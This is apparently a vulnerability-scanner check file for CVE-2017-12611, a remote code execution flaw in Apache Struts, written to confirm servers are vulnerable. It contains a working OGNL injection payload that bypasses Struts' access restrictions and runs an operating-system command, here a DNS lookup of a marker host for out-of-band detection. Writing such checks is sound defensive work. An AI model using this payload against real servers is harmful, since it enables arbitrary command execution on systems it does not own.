CVE-2017-12611.yaml

collect:
  - uniq:
    - [ URI ]

generate:
  - into:
    - GET
  - payload:
    - "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ping -n 1 DNS_MARKER'}:{'/bin/sh','-c','getent hosts DNS_MARKER'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}"

    - "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-WLRM-VLN-CHECK','STR_MARKER')}.multipart/form-data"

  - method:
    - replace

detect:
  - oob:
    - dns
  - response:
    - headers:
      - "X-WLRM-VLN-CHECK": STR_MARKER

meta-info:
  - type: rce
  - threat: 90
  - applicable_for: ["attack_rechecker"]
  - tags:
    - RCE
    - Remote Code Execution
    - CVE-2017-12611
    - Apache Struts 2.0.1 through 2.3.33 and 2.5 through 2.5.10